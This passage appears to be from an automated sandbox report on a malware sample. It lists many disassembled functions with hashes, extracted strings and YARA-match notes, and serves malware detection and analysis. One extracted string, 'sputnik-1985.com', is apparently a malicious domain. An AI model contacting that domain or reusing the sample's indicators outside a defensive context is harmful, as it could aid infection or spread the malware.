                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                        • API String ID: 0-2390459867
                                                                                                                                                                                                                                        • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                        • Instruction ID: e8062cfa3f92b269e517a95a0a15263ae71e3fa69566e020a52e9e5137cfccfc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7281F86030C3928BD718CF3A946136BBBD19FD6314F69896EE4D68B381D27DC406875A
                                                                                                                                                                                                                                        Function 021091F7 Relevance: 4.1, Strings: 3, Instructions: 304COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: #=0$Z$ut
                                                                                                                                                                                                                                        • API String ID: 0-1971374411
                                                                                                                                                                                                                                        • Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                                                                                                                                                        • Instruction ID: 42d3a945511ead4ed7eb64260d71ddddd0654dd79c184a917e0c59020751881d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F481053110C3828AD7058F38C5A076AFFE1AF93618F1899ADD4D29B6D3D769C50AC752
                                                                                                                                                                                                                                        Function 0212EE08 Relevance: 4.0, Strings: 3, Instructions: 290COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                        • API String ID: 0-2390459867
                                                                                                                                                                                                                                        • Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                                        • Instruction ID: 4e91ba10509c99057e522f134dd552df8ce00cc9fb23ae0ddfc6b0978cc1ae6a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E81D9612483918BD719CF3984A137AFFE29FD6218F1C496DF4D18B281D339C50ACB56
                                                                                                                                                                                                                                        Function 0042EBA1 Relevance: 4.0, Strings: 3, Instructions: 290COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                        • API String ID: 0-2390459867
                                                                                                                                                                                                                                        • Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                                        • Instruction ID: b31d7765b50fe5da72acd4eceaa3461b1016088ded1e177ce8b27f3ca53c8b68
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E81E8602083918BD719CF3A946136BFFD29FE6314F6D496EE4D18B381D23CC5068B5A
                                                                                                                                                                                                                                        Function 00442D20 Relevance: 4.0, Strings: 3, Instructions: 282COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: D`a&$NMNO$bX_^
                                                                                                                                                                                                                                        • API String ID: 2994545307-620122162
                                                                                                                                                                                                                                        • Opcode ID: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
                                                                                                                                                                                                                                        • Instruction ID: 6e9e5fc7c2cb7ec0ed59593f00f51acd5d9bbc11244cb29e2d173750d6d6eb6d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 558167312083014FE318DF24DC8166BB7A2EBC5328F69862DE5A54B391DB79ED0AC759
                                                                                                                                                                                                                                        Function 021184C2 Relevance: 4.0, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: )$7$gfff
                                                                                                                                                                                                                                        • API String ID: 0-3859371245
                                                                                                                                                                                                                                        • Opcode ID: 60e49d7894c15ae3aa33853dce523991c204049145f125d3a07e5eda309779ae
                                                                                                                                                                                                                                        • Instruction ID: 5386bd131c15603fb9593596c4608c3c37134d7ede0c1f8828f48437460f5d4a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 60e49d7894c15ae3aa33853dce523991c204049145f125d3a07e5eda309779ae
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61812772A542518BD328CF28CC51BAB77D2EBC4314F1AC93DD495DB395EB38D5068B81
                                                                                                                                                                                                                                        Function 0041825B Relevance: 4.0, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: )$7$gfff
                                                                                                                                                                                                                                        • API String ID: 0-3859371245
                                                                                                                                                                                                                                        • Opcode ID: 65dc81d769e5c8ee4e27a7d15ee325795d27feb2d3b9459f78503db774decfd6
                                                                                                                                                                                                                                        • Instruction ID: 9f03ba7914f0360cb7709cea8ad3b28f347f0d2189de7c473bd193f5a0b7fd0c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65dc81d769e5c8ee4e27a7d15ee325795d27feb2d3b9459f78503db774decfd6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4812572A142118BD324CF28DC417AB77E2EBC8314F18C92ED985DB395EB3CD8468785
                                                                                                                                                                                                                                        Function 00427133 Relevance: 4.0, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: FOOE$KGFU$UUQg
                                                                                                                                                                                                                                        • API String ID: 0-2281124432
                                                                                                                                                                                                                                        • Opcode ID: aa3e6234d37e5ff48adc82abd2c06de17444a92e0354e9c2c603a59569284f89
                                                                                                                                                                                                                                        • Instruction ID: e3d0f05a3102c402a5be3d16b6d50dde008b8d5973f854c9b7a8b98ef3316d4d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa3e6234d37e5ff48adc82abd2c06de17444a92e0354e9c2c603a59569284f89
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A619D72B49262CFD710CBA4D8402AAF7A2EF55310B5D42ABD8558B382E33CDD12D3A5
                                                                                                                                                                                                                                        Function 0211B18B Relevance: 3.9, Strings: 3, Instructions: 196COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 5230$I`af$t]ae
                                                                                                                                                                                                                                        • API String ID: 0-812676372
                                                                                                                                                                                                                                        • Opcode ID: 99ad52d241a312d1886458a9d982083b732080c3046440976dde46d31c833c5f
                                                                                                                                                                                                                                        • Instruction ID: c82dbcb598043c5e25759bf7f640b69b66c4d0938de340b83326361af9066621
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99ad52d241a312d1886458a9d982083b732080c3046440976dde46d31c833c5f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31513772A59B808FD739CF65C891B67BBE3AB91308F19896DC1C287695DBB9A005C700
                                                                                                                                                                                                                                        Function 0211DD37 Relevance: 3.9, Strings: 3, Instructions: 156COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 1$5230$A
                                                                                                                                                                                                                                        • API String ID: 0-2921844354
                                                                                                                                                                                                                                        • Opcode ID: c88d49dccca9c115cac4552a1e1a4679eb3bb04cb6d09c4ebc94843ec1f1dc21
                                                                                                                                                                                                                                        • Instruction ID: 1681a60db8ab902e8cb0d2e519a85c9a5933a279ccc1e45f417515bb0feaa5c3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c88d49dccca9c115cac4552a1e1a4679eb3bb04cb6d09c4ebc94843ec1f1dc21
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 06416872A8C3406AE724AE65DC8176BB6E3EBD1324F1CC97DE199572C4EAB944038312
                                                                                                                                                                                                                                        Function 0041DAD0 Relevance: 3.9, Strings: 3, Instructions: 156COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 1$5230$A
                                                                                                                                                                                                                                        • API String ID: 0-2921844354
                                                                                                                                                                                                                                        • Opcode ID: 2f0b92b3633f1c98435bd7295618cc795514d651c00833ac90ced833c2e04a77
                                                                                                                                                                                                                                        • Instruction ID: e76a71f95e24524307293e01d01a6f58a23ad2f1a40c0433447d02162c8ae966
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2f0b92b3633f1c98435bd7295618cc795514d651c00833ac90ced833c2e04a77
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8416972A5C3405AE324AE65CC827ABB6D3EBD1324F18C93EF1D9472C5E9F848428316
                                                                                                                                                                                                                                        Function 0210092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                        • API String ID: 0-2784972518
                                                                                                                                                                                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                        • Instruction ID: 8d3964254565dfb7a40da2e234806515813b4f54de45dc01fec139ea16ba0e7d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 573148B6900609DFDB10CF99C880BAEBBF9FF48324F15404AD845A7250D7B1EA45CBA4
                                                                                                                                                                                                                                        Function 00414C20 Relevance: 3.5, Strings: 2, Instructions: 989COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: NP,?$UA
                                                                                                                                                                                                                                        • API String ID: 0-2573221895
                                                                                                                                                                                                                                        • Opcode ID: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
                                                                                                                                                                                                                                        • Instruction ID: 7e2827b50fa6ca7fd58d98589243822aea337e03717d5c259c09a672e0419966
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F522475608310DBD714DF28DC82BAB73A2EBC6314F58463DF995872E1E738A846C789
                                                                                                                                                                                                                                        Function 0041F6D0 Relevance: 3.3, Strings: 2, Instructions: 817COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 9B$B
                                                                                                                                                                                                                                        • API String ID: 0-4208784936
                                                                                                                                                                                                                                        • Opcode ID: 998969fd36f39ea8882a93f1b2bc5358949fe11c9a695f48cb2043242e4bd665
                                                                                                                                                                                                                                        • Instruction ID: b8962ee0846928653caa32ab1d9872d6313577c24d17d84896ac92dc99d0ed25
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 998969fd36f39ea8882a93f1b2bc5358949fe11c9a695f48cb2043242e4bd665
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF72B1B1619F808ED329CF3C8805397BFD6AB5A324F188B5EA0FA877D2C77561018756
                                                                                                                                                                                                                                        Function 0042B170 Relevance: 2.9, Strings: 2, Instructions: 428COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: {wBy$?;;
                                                                                                                                                                                                                                        • API String ID: 0-3800777323
                                                                                                                                                                                                                                        • Opcode ID: 7def6b60f56c6d725d5e071de4d200a350b8a8c6a335b4aaf75fe223ba032cac
                                                                                                                                                                                                                                        • Instruction ID: c7db1f9763108cdebf81104c4566820d91597438b4a38115d6d9003e34c696d3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7def6b60f56c6d725d5e071de4d200a350b8a8c6a335b4aaf75fe223ba032cac
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1AF1F1B4A08350DFD3159F28E89172BB7E1EF86308F484A6DF4D5872A2D3399901DB5A
                                                                                                                                                                                                                                        Function 021320F5 Relevance: 2.9, Strings: 2, Instructions: 383COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: nz$nz
                                                                                                                                                                                                                                        • API String ID: 0-4002586851
                                                                                                                                                                                                                                        • Opcode ID: 657b8ad3b5a701e97fdb508390c6d00fb43f0f4f68eec0077ab5ee9a3c7d2eea
                                                                                                                                                                                                                                        • Instruction ID: 0595a21b0f34da2779b8163bd3e774a810e440d158280e19aca7cd4d4a89eb3a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 657b8ad3b5a701e97fdb508390c6d00fb43f0f4f68eec0077ab5ee9a3c7d2eea
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62E1E772608B808FD315DB3CC891396BFE3AF9A310F1D866DC5EA8B392D675A805C751
                                                                                                                                                                                                                                        Function 00431E8E Relevance: 2.9, Strings: 2, Instructions: 383COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: nz$nz
                                                                                                                                                                                                                                        • API String ID: 0-4002586851
                                                                                                                                                                                                                                        • Opcode ID: 526f9c3809e7de32db1ba61d9cd3c8c0a105809dfbe68e8e8f0a49bf4be969cf
                                                                                                                                                                                                                                        • Instruction ID: a3c1cfee1f99e453375e064e447a228442ae2f14524e15aa7be5cf63e3ec65e5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 526f9c3809e7de32db1ba61d9cd3c8c0a105809dfbe68e8e8f0a49bf4be969cf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACE11872608B808FD315CA3CC891396FFE2AFDA314F1D866DC5EA8B392D675A406C715
                                                                                                                                                                                                                                        Function 0210E249 Relevance: 2.8, Strings: 2, Instructions: 311COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: UXY^$sputnik-1985.com
                                                                                                                                                                                                                                        • API String ID: 0-288947201
                                                                                                                                                                                                                                        • Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                                                                                                                                                        • Instruction ID: 36a2f563dffbc950d33f107955b6241340eabd8a5ff9c9aa4c75c12c97de5944
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 329105B5604B818FD3158F26C9D0662FBA2FF56304B19869CC0D28FB56C779E406CF95
                                                                                                                                                                                                                                        Function 021276F7 Relevance: 2.8, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: o~$yr
                                                                                                                                                                                                                                        • API String ID: 0-1013308823
                                                                                                                                                                                                                                        • Opcode ID: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
                                                                                                                                                                                                                                        • Instruction ID: ccddbab88ac9dbbc84c2e044d8d2c8942bd826e3034fd6aaf9af98ae2c9f5395
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E391267694C3608BD320DF19C854A6BF7E2EFC5324F09892CE9D95B391E7B4850AC786
                                                                                                                                                                                                                                        Function 00427490 Relevance: 2.8, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: o~$yr
                                                                                                                                                                                                                                        • API String ID: 0-1013308823
                                                                                                                                                                                                                                        • Opcode ID: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
                                                                                                                                                                                                                                        • Instruction ID: 9949b5826033667454bdd212c251d03fc0b1eef30724b4879d74d6325ed2a79f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 48913975A0C3208BD320DF19D84066BBBE2EFD5324F09892DE9D95B391E7B8C905C786
                                                                                                                                                                                                                                        Function 02142F87 Relevance: 2.8, Strings: 2, Instructions: 282COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: D`a&$NMNO
                                                                                                                                                                                                                                        • API String ID: 0-4143563191
                                                                                                                                                                                                                                        • Opcode ID: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
                                                                                                                                                                                                                                        • Instruction ID: e1338bde36659543b433f2822998b76e3412c76adc1f1493ac4d857675c59c7b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 268136316483455FD318DF28DC81A6BB7A3EFC5328F29C66CE9A94B391DB31A809C751
                                                                                                                                                                                                                                        Function 021284E7 Relevance: 2.6, Strings: 2, Instructions: 70COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: :7$%$:7$%
                                                                                                                                                                                                                                        • API String ID: 0-2391988857
